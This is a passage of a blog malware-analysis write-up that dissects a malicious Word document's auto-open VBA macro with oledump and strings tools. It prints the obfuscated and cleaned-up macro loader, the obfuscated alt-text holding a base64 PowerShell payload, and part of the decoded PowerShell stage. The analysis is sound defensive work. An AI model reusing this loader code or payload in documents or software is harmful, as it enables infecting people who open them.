_\r\n(Rn60_vw9ki0a5akw, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Mqesnmb7i1uj3elp, 212, 1)\r\nBiHOVG = Mid _\r\n(Kl93_qjt6042y, 35, 1)\r\nGQJzwq = Mid _\r\n(Cv_b0_hlb4d3, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Aztexwux_z7ra7_tn, 9, 1)\r\nlsFUF = Mid _\r\n(Dvvry4cnpbdj, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Rivi6l6gfdte, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Cv0ei3yv9gkva2bkgs, 179, 1)\r\nwYVOV = Mid _\r\n(Suhjpxfhscarcm3, 190, 1)\r\nmLdZb = Mid _\r\n(Nol5lvu2bly6v580, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Zon7lurdvgt9zhi, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Bt76zhearid_, 168, 1)\r\nUCPVYn = Mid _\r\n(Qygb8c9p4h652, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Ka4mdpvtlae73kmp, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nZk46e7c8d40 = B4ru9eb_hhowd\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(J2hq9d7fh_35w37, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Qzaz3l4map05, 212, 1)\r\nBiHOVG = Mid _\r\n(E6d_d1y90o683, 35, 1)\r\nGQJzwq = Mid _\r\n(X2ft_p4no8w4b9, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Lteb3aez6tchkykg3, 9, 1)\r\nlsFUF = Mid _\r\n(V8v770pv4qg, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Hz1ct716aq3cl, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Yhszd264hbjuxgxgiz, 179, 1)\r\nwYVOV = Mid _\r\n(Minshfpq8_oetv8, 190, 1)\r\nmLdZb = Mid _\r\n(Fcdnqtsrz50, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Oi5idu52uzlu, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(H94481_2epeelc92, 168, 1)\r\nUCPVYn = Mid _\r\n(Uogg7zgfb_2frt3uyf, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Sz4d_sp41e3r7ay, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nEnd Function\r\nFunction Qfyk87zgdp86ufle()\r\nOn Error Resume Next\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(M7xg60mfwvhnr6jtot, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Y0gc8q4z0esg, 212, 1)\r\nBiHOVG = Mid 
_\r\n(Hfm2hak4b9qmfoo9y5, 35, 1)\r\nGQJzwq = Mid _\r\n(Onxbk521bjnb, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Kjcmstmoio7, 9, 1)\r\nlsFUF = Mid _\r\n(T12bp3lknww, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Cc9qkjty8m98mcpf, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Um02aud_yxsc22, 179, 1)\r\nwYVOV = Mid _\r\n(Qoiqw7d07ieo451mm, 190, 1)\r\nmLdZb = Mid _\r\n(Uvjx9ds5rxxb, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Ewdk950uwzndt8g, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(D9kf89fu_qe03, 168, 1)\r\nUCPVYn = Mid _\r\n(Lm5w04zu4tnwh8, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Ophmulzn8ziqtkrza4, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nPuw2oumxgis = &quot;powe&quot; + &quot;rshe&quot; + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Oeqcm_gbql69pr, 196, 1)\r\ndYvJsnjw = Mid _\r\n(P4gtyykmim4tkfkr6, 212, 1)\r\nBiHOVG = Mid _\r\n(Yj6i49td8tp, 35, 1)\r\nGQJzwq = Mid _\r\n(R181wcx8d2k3h2uq, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Xf6_7qi8najau238uy, 9, 1)\r\nlsFUF = Mid _\r\n(Quui500h0da, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Jchbnv14jz4, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Bn8u_t6ycr5m, 179, 1)\r\nwYVOV = Mid _\r\n(Yab9jj5m079n1, 190, 1)\r\nmLdZb = Mid _\r\n(I66492lgrboiqi, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Z8i7zqvz7ap_8, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(M_hkft4hz7v, 168, 1)\r\nUCPVYn = Mid _\r\n(Tu_ta5w00_z, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(A02g_3t3od0ch0, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nQfyk87zgdp86ufle = Zk46e7c8d40(Puw2oumxgis)\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(C79um_qaar3a8crt, 196, 1)\r\ndYvJsnjw = Mid _\r\n(T9s69dfveqqh1ef5nq, 212, 1)\r\nBiHOVG = Mid _\r\n(Mxpn2nii2x7, 35, 1)\r\nGQJzwq 
= Mid _\r\n(X9bz6a6f43_hta5ln, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Fuxrbkmu2s17p0j, 9, 1)\r\nlsFUF = Mid _\r\n(Okzpk4tkizyh62u, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Weplip72nljnq8na09, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Ox9mobnimxe1_9, 179, 1)\r\nwYVOV = Mid _\r\n(Alt9nfo0b_tg5lmxi, 190, 1)\r\nmLdZb = Mid _\r\n(Hak93bk7htdjvkpy8c, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Bvlfz7n67t8aa75, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Ysctrxs9764oj2fp, 168, 1)\r\nUCPVYn = Mid _\r\n(Dhl_7wcpgpmks, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(J3vsg6taodn, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nEnd Function\r\n<\/pre>\n<p>And within the other stream (-s 13) I saw how the macro kicks off &#8211; when the Word doc is opened and the macro is run (auto_open).<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nherbie$ .\/oledump.py -v -s 13 LRE-090120\\ JYW-092120.doc \r\nAttribute VB_Name = &quot;V216c23yqw7e5o2v&quot;\r\nAttribute VB_Base = &quot;1Normal.ThisDocument&quot;\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\nPrivate Sub Document_open()\r\nP72j6t412f1985pd6 = Array(J0uidqx1c0a3u + &quot;Th1h6l0aavkju7xS367iljm3kweq5z0v E1eiiunn0096&quot; + Tdkjj9ylr9nquz5ug8, Rn29ystlt6mlp, Uoepmfd2vqk2.Cbzdhgt82a6foxc53q, K7bfvpb88z323z6t43 + &quot;Pgtagw22wfq Q9sf54owsl3 Bf925racvi5276 N6yp3qvf4kub2oguk&quot;)\r\nEnd Sub\r\n<\/pre>\n<p>Looking at this line, it looks like it is building an array of values to execute the macro. 
The interesting thing is that none of the values are found in the script (as far as I could tell), with the exception of &#8220;Uoepmfd2vqk2.Cbzdhgt82a6foxc53q&#8221;, which points to the main function of the script. If I had to hazard a guess, I would say that the other values are just garbage values to help obfuscate the code.<\/p>\n<p>After a while of looking at the script and seeing which lines were valid and which were garbage, one thing stood out to me &#8211; the lines to keep were all the ones immediately before the statement &#8220;Set nnnnnnnnn = Languages.&#8221; Once I noticed that, it made cleaning up the script much easier. The following is the cleaned-up script.<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nFunction Cbzdhgt82a6foxc53q()\r\n\tOn Error Resume Next\r\n\tQuuseim6entz = 90\r\n\tAy7pmbj8ld_rk9 = Vc0veos27yszc + Chr$(Quuseim6entz + (25))\r\n\tIhietwpuyrj0nq6 = &quot;g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq,&quot; + Ay7pmbj8ld_rk9 + &quot;g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq,&quot; + Uoepmfd2vqk2.Wjhx20hqda94eekj + &quot;g, bq,rog, bq,g, bq,ceg, bq,sg, bq,sg, bq,&quot;\r\n\tWuueqzhfpms6gh3_p = Zk46e7c8d40(Ihietwpuyrj0nq6)\r\n\tSet Cfsnuq6d3vy5e = CreateObject(Wuueqzhfpms6gh3_p)\r\n\tOxxxpk19hkgi4c7c0z = Zdlifyn2pwzi0u2e4i + Wuueqzhfpms6gh3_p + Ay7pmbj8ld_rk9 + Uoepmfd2vqk2.W8w3wpmit80chp7lx + Uoepmfd2vqk2.Dd8cp5opvyber\r\n\tSet Tn1cdl9lltyho4skel = Ngdcwyg32b4skvo5c1(Oxxxpk19hkgi4c7c0z + Uoepmfd2vqk2.Wjhx20hqda94eekj)\r\n\tCfsnuq6d3vy5e.Create Qfyk87zgdp86ufle, P3_qwk943i1k8ql6, Tn1cdl9lltyho4skel\r\nEnd Function\r\n\r\nFunction Zk46e7c8d40(G7b_e54iwh7id_)\r\n\tOn Error Resume Next\r\n\tX8e38jclqayh83g3a6 = CleanString(G7b_e54iwh7id_)\r\n\tHy1d43_mrbnkby5l = Split(X8e38jclqayh83g3a6, &quot;g, bq,&quot;)\r\n\tB4ru9eb_hhowd = Sg918dyn87p9_2 + Join(Hy1d43_mrbnkby5l, Gcqeayz9i6vt1m44y1)\r\n\tZk46e7c8d40 = B4ru9eb_hhowd\r\nEnd 
Function\r\n\r\nFunction Ngdcwyg32b4skvo5c1(Wu67qms7o3ov3f_u2)\r\n\tOn Error Resume Next\r\n\tSet Ngdcwyg32b4skvo5c1 = GetObject(Wu67qms7o3ov3f_u2)\r\n\tNgdcwyg32b4skvo5c1.showwindow = wdKeyEquals - wdKeyEquals\r\nEnd Function\r\n\r\nFunction Qfyk87zgdp86ufle()\r\n\tOn Error Resume Next\r\n\tPuw2oumxgis = &quot;powe&quot; + &quot;rshe&quot; + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$\r\n\tQfyk87zgdp86ufle = Zk46e7c8d40(Puw2oumxgis)\r\nEnd Function\r\n<\/pre>\n<p>With the script shortened, it was pretty straightforward to walk through it and trace when each function got called and what parameters were passed to it. I had not previously seen the CleanString method used to remove non-printable characters before the Join function. I was also able to use the trick of opening the Word doc (without enabling the macro) and pressing ALT-F11 to open the Visual Basic for Applications window to see everything that was there. I noticed that there was a form there with different values assigned to the &#8220;Text&#8221; property of the object.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/09\/vb.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/09\/vb.png\" alt=\"\" width=\"1571\" height=\"983\" class=\"aligncenter size-full wp-image-1414\" \/><\/a><\/p>\n<p>The interesting bit for me about this script, and the main impetus for this write-up, was this line:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPuw2oumxgis = &quot;powe&quot; + &quot;rshe&quot; + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$\r\n<\/pre>\n<p>Looking up &#8220;Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText&#8221; pointed me to docs and tips about how to add alternative text to a shape or object in an Office doc, either in the GUI or via 
code in VB. Seeing that there was only 1 image in the Word doc, I opened the properties of the image and looked at the alt-text tab there and got the following:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/09\/alt-test.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/09\/alt-test.png\" alt=\"\" width=\"451\" height=\"458\" class=\"aligncenter size-full wp-image-1412\" \/><\/a><\/p>\n<p>The following is the string of characters found in the alt-text:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\ng, bq,g, bq,lg, bq,lg, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq,-g, bq,eg, bq,ng, bq, JABg, bq,VAGg, bq,UAdg, bq,gB3g, bq,AHog, bq,AZwg, bq,B6Ag, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAQg, bq,gAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,G4Ag, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,ANAg, bq,A1Ag, bq,CcAg, bq,KwAg, bq,nAHg, bq,AAJg, bq,wApg, bq,ACkg, bq,AOwg, bq,AmAg, bq,CgAg, bq,JwBg, bq,uAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,Adwg, bq,AtAg, bq,GkAg, bq,dAAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AG0g, bq,AJwg, bq,ApAg, bq,CAAg, bq,JABg, bq,FAEg, bq,4AVg, bq,gA6g, bq,AHUg, bq,Acwg, bq,BFAg, bq,HIAg, bq,cABg, bq,yAEg, bq,8ARg, bq,gBpg, bq,AGwg, bq,AZQg, bq,BcAg, bq,HkAg, bq,dgAg, bq,zAFg, bq,cAbg, bq,QA5g, bq,AGcg, bq,AXAg, bq,B3Ag, bq,FoAg, bq,TgAg, bq,3ADg, bq,gAZg, bq,QA4g, bq,AFwg, bq,AIAg, bq,AtAg, bq,GkAg, bq,dABg, bq,lAGg, bq,0Adg, bq,AB5g, bq,AHAg, bq,AZQg, bq,AgAg, bq,GQAg, bq,SQBg, bq,SAGg, bq,UAQg, bq,wBUg, bq,AG8g, bq,AUgg, bq,B5Ag, bq,DsAg, bq,WwBg, bq,OAGg, bq,UAdg, bq,AAug, bq,AFMg, bq,AZQg, bq,ByAg, bq,HYAg, bq,aQBg, bq,jAGg, bq,UAUg, bq,ABvg, 
bq,AGkg, bq,Abgg, bq,B0Ag, bq,E0Ag, bq,YQBg, bq,uAGg, bq,EAZg, bq,wBlg, bq,AHIg, bq,AXQg, bq,A6Ag, bq,DoAg, bq,IgBg, bq,TAEg, bq,UAQg, bq,wBgg, bq,AFUg, bq,Acgg, bq,BJAg, bq,GAAg, bq,VABg, bq,ZAFg, bq,AAYg, bq,ABSg, bq,AE8g, bq,AdAg, bq,BPAg, bq,EMAg, bq,YABg, bq,vAGg, bq,wAIg, bq,gAgg, bq,AD0g, bq,AIAg, bq,AoAg, bq,CgAg, bq,JwBg, bq,0AGg, bq,wAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,AxAg, bq,DIAg, bq,LAAg, bq,nACg, bq,kAKg, bq,wAng, bq,ACAg, bq,AdAg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,Acwg, bq,AxAg, bq,DEAg, bq,LAAg, bq,gAHg, bq,QAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,MAJg, bq,wApg, bq,ADsg, bq,AJAg, bq,BRAg, bq,DMAg, bq,eQBg, bq,3AGg, bq,kAbg, bq,wBvg, bq,ACAg, bq,APQg, bq,AgAg, bq,CgAg, bq,KAAg, bq,nAFg, bq,QAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAwg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GIAg, bq,YwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHAg, bq,AJwg, bq,ApAg, bq,DsAg, bq,JABg, bq,FAGg, bq,YAZg, bq,QA1g, bq,AHEg, bq,Aegg, bq,A5Ag, bq,D0Ag, bq,KAAg, bq,nAFg, bq,cAJg, bq,wArg, bq,ACgg, bq,AJwg, bq,B6Ag, bq,CcAg, bq,KwAg, bq,nADg, bq,UAZg, bq,AA0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,NABg, bq,lACg, bq,cAKg, bq,QA7g, bq,ACQg, bq,AQgg, bq,BuAg, bq,HAAg, bq,XwBg, bq,zADg, bq,UAdg, bq,gA9g, bq,ACQg, bq,AZQg, bq,BuAg, bq,HYAg, bq,OgBg, bq,1AHg, bq,MAZg, bq,QByg, bq,AHAg, bq,Acgg, bq,BvAg, bq,GYAg, bq,aQBg, bq,sAGg, bq,UAKg, bq,wAog, bq,ACgg, bq,AKAg, bq,AnAg, bq,GcAg, bq,JwAg, bq,rACg, bq,cAUg, bq,QBXg, bq,AFkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dgAg, bq,zACg, bq,cAKg, bq,QArg, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,tACg, bq,cAKg, bq,wAng, bq,ADkg, bq,AZwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,cAUg, bq,QAng, bq,ACsg, bq,AJwg, bq,BXAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBXg, bq,AHog, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgAg, bq,3ACg, bq,cAKg, bq,QArg, bq,ACcg, bq,AOAg, bq,BlAg, bq,CcAg, bq,KwAg, bq,oACg, bq,cAOg, bq,ABng, bq,AFEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,VwAg, bq,nACg, 
bq,kAKg, bq,QAug, bq,ACIg, bq,Acgg, bq,BlAg, bq,HAAg, bq,YABg, bq,sAGg, bq,AAQg, bq,QBjg, bq,AGUg, bq,AIgg, bq,AoAg, bq,CgAg, bq,WwBg, bq,DAGg, bq,gAQg, bq,QByg, bq,AF0g, bq,AMQg, bq,AwAg, bq,DMAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DEAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DcAg, bq,KQAg, bq,sAFg, bq,sAcg, bq,wBUg, bq,AFIg, bq,ASQg, bq,BOAg, bq,EcAg, bq,XQBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A5Ag, bq,DIAg, bq,KQAg, bq,pACg, bq,sAJg, bq,ABRg, bq,ADMg, bq,AeQg, bq,B3Ag, bq,GkAg, bq,bwBg, bq,vACg, bq,sAKg, bq,AAng, bq,AC4g, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, bq,gAJg, bq,wArg, bq,ACcg, bq,AZQg, bq,AnAg, bq,CkAg, bq,KQAg, bq,7ACg, bq,QAWg, bq,ABzg, bq,AHQg, bq,AYgg, bq,B1Ag, bq,HgAg, bq,cgAg, bq,9\r\n<\/pre>\n<p>Hrmm. Interesting to say the least considering that there is a method to remove (or split) the characters of &#8220;g,bq&#8221; after cleaning up all non-printable characters. Once I got rid of those characters, I was left with the following string:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n,,l,l, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,-,e,n, 
JAB,VAG,UAd,gB3,AHo,AZw,B6A,D0A,KAA,oAC,cAQ,gAn,ACs,AJw,BrA,G4A,dAA,nAC,kAK,wAo,ACc,ANA,A1A,CcA,KwA,nAH,AAJ,wAp,ACk,AOw,AmA,CgA,JwB,uAG,UAJ,wAr,ACc,Adw,AtA,GkA,dAA,nAC,sAJ,wBl,AG0,AJw,ApA,CAA,JAB,FAE,4AV,gA6,AHU,Acw,BFA,HIA,cAB,yAE,8AR,gBp,AGw,AZQ,BcA,HkA,dgA,zAF,cAb,QA5,AGc,AXA,B3A,FoA,TgA,3AD,gAZ,QA4,AFw,AIA,AtA,GkA,dAB,lAG,0Ad,AB5,AHA,AZQ,AgA,GQA,SQB,SAG,UAQ,wBU,AG8,AUg,B5A,DsA,WwB,OAG,UAd,AAu,AFM,AZQ,ByA,HYA,aQB,jAG,UAU,ABv,AGk,Abg,B0A,E0A,YQB,uAG,EAZ,wBl,AHI,AXQ,A6A,DoA,IgB,TAE,UAQ,wBg,AFU,Acg,BJA,GAA,VAB,ZAF,AAY,ABS,AE8,AdA,BPA,EMA,YAB,vAG,wAI,gAg,AD0,AIA,AoA,CgA,JwB,0AG,wAc,wAn,ACs,AJw,AxA,DIA,LAA,nAC,kAK,wAn,ACA,AdA,AnA,CsA,KAA,nAG,wAJ,wAr,ACc,Acw,AxA,DEA,LAA,gAH,QAJ,wAp,ACs,AJw,BsA,CcA,KwA,nAH,MAJ,wAp,ADs,AJA,BRA,DMA,eQB,3AG,kAb,wBv,ACA,APQ,AgA,CgA,KAA,nAF,QAJ,wAr,ACc,AaQ,BpA,CcA,KQA,rAC,gAJ,wAw,ACc,AKw,AnA,GIA,YwA,nAC,kAK,wAn,AHA,AJw,ApA,DsA,JAB,FAG,YAZ,QA1,AHE,Aeg,A5A,D0A,KAA,nAF,cAJ,wAr,ACg,AJw,B6A,CcA,KwA,nAD,UAZ,AA0,ACc,AKQ,ArA,CcA,NAB,lAC,cAK,QA7,ACQ,AQg,BuA,HAA,XwB,zAD,UAd,gA9,ACQ,AZQ,BuA,HYA,OgB,1AH,MAZ,QBy,AHA,Acg,BvA,GYA,aQB,sAG,UAK,wAo,ACg,AKA,AnA,GcA,JwA,rAC,cAU,QBX,AFk,AJw,ArA,CcA,dgA,zAC,cAK,QAr,ACc,Adw,AnA,CsA,JwB,tAC,cAK,wAn,ADk,AZw,AnA,CsA,KAA,nAG,cAU,QAn,ACs,AJw,BXA,CcA,KQA,rAC,gAJ,wBX,AHo,AJw,ArA,CcA,bgA,3AC,cAK,QAr,ACc,AOA,BlA,CcA,KwA,oAC,cAO,ABn,AFE,AJw,ArA,CcA,VwA,nAC,kAK,QAu,ACI,Acg,BlA,HAA,YAB,sAG,AAQ,QBj,AGU,AIg,AoA,CgA,WwB,DAG,gAQ,QBy,AF0,AMQ,AwA,DMA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DEA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DcA,KQA,sAF,sAc,wBU,AFI,ASQ,BOA,EcA,XQB,bAE,MAa,ABB,AHI,AXQ,A5A,DIA,KQA,pAC,sAJ,ABR,ADM,AeQ,B3A,GkA,bwB,vAC,sAK,AAn,AC4,AJw,ArA,CgA,JwB,lAH,gAJ,wAr,ACc,AZQ,AnA,CkA,KQA,7AC,QAW,ABz,AHQ,AYg,B1A,HgA,cgA,9\r\n<\/pre>\n<p>Now I see what is going on &#8211; we have a long base64 encoded string for Powershell. 
The thing I found odd was that it ended at the character &#8216;9&#8217;. Decoding that string gave me the following code:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n$Uevwzgz=((B+knt)+(45+p));\r\n&amp;(ne+w-it+em) $ENV:usErprOFile\\yv3Wm9g\\wZN78e8\\ -itemtype dIReCToRy;\r\n&#x5B;Net.ServicePointManager]::&quot;SECUrITYPROtOCol&quot; = ((tls+12,)+ t+(l+s11, t)+l+s);\r\n$Q3ywioo = ((T+ii)+(0+bc)+p);\r\n$Efe5qz9=(W+(z+5d4)+4e);\r\n$Bnp_s5v=$env:userprofile+(((g+QWY+v3)+w+m+9g+(gQ+W)+(Wz+n7)+8e+(8gQ+W)).&quot;replAce&quot;((&#x5B;ChAr]103+&#x5B;ChAr]81+&#x5B;ChAr]87),&#x5B;sTRING]&#x5B;ChAr]92))+$Q3ywioo+(.+(ex+e));\r\n$Xstbuxr\r\n<\/pre>\n<p>Clearly there had to be more to this than that, but I was not able to find anything else in the document. I ended up running the sample on my Windows VM and could see that the base64 string was longer than what I had here, so I knew I was missing something. It was then that I remembered Didier&#8217;s &#8216;strings.py&#8217; script. I love using this script because the &#8216;-L&#8217; flag sorts the output from the shortest string to the longest. When I went back through that output, I found where the rest of the base64 string was. 
The following was split into 2 sections (basically duplicated) when looking at it in strings.py:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\ng, bq,g, bq,lg, bq,lg, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq,-g, bq,eg, bq,ng, bq, JABg, bq,VAGg, bq,UAdg, bq,gB3g, bq,AHog, bq,AZwg, bq,B6Ag, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAQg, bq,gAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,G4Ag, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,ANAg, bq,A1Ag, bq,CcAg, bq,KwAg, bq,nAHg, bq,AAJg, bq,wApg, bq,ACkg, bq,AOwg, bq,AmAg, bq,CgAg, bq,JwBg, bq,uAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,Adwg, bq,AtAg, bq,GkAg, bq,dAAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AG0g, bq,AJwg, bq,ApAg, bq,CAAg, bq,JABg, bq,FAEg, bq,4AVg, bq,gA6g, bq,AHUg, bq,Acwg, bq,BFAg, bq,HIAg, bq,cABg, bq,yAEg, bq,8ARg, bq,gBpg, bq,AGwg, bq,AZQg, bq,BcAg, bq,HkAg, bq,dgAg, bq,zAFg, bq,cAbg, bq,QA5g, bq,AGcg, bq,AXAg, bq,B3Ag, bq,FoAg, bq,TgAg, bq,3ADg, bq,gAZg, bq,QA4g, bq,AFwg, bq,AIAg, bq,AtAg, bq,GkAg, bq,dABg, bq,lAGg, bq,0Adg, bq,AB5g, bq,AHAg, bq,AZQg, bq,AgAg, bq,GQAg, bq,SQBg, bq,SAGg, bq,UAQg, bq,wBUg, bq,AG8g, bq,AUgg, bq,B5Ag, bq,DsAg, bq,WwBg, bq,OAGg, bq,UAdg, bq,AAug, bq,AFMg, bq,AZQg, bq,ByAg, bq,HYAg, bq,aQBg, bq,jAGg, bq,UAUg, bq,ABvg, bq,AGkg, bq,Abgg, bq,B0Ag, bq,E0Ag, bq,YQBg, bq,uAGg, bq,EAZg, bq,wBlg, bq,AHIg, bq,AXQg, bq,A6Ag, bq,DoAg, bq,IgBg, bq,TAEg, bq,UAQg, bq,wBgg, bq,AFUg, bq,Acgg, bq,BJAg, bq,GAAg, bq,VABg, bq,ZAFg, bq,AAYg, bq,ABSg, bq,AE8g, bq,AdAg, bq,BPAg, bq,EMAg, bq,YABg, bq,vAGg, bq,wAIg, bq,gAgg, bq,AD0g, bq,AIAg, bq,AoAg, bq,CgAg, bq,JwBg, bq,0AGg, bq,wAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,AxAg, bq,DIAg, bq,LAAg, bq,nACg, bq,kAKg, bq,wAng, bq,ACAg, 
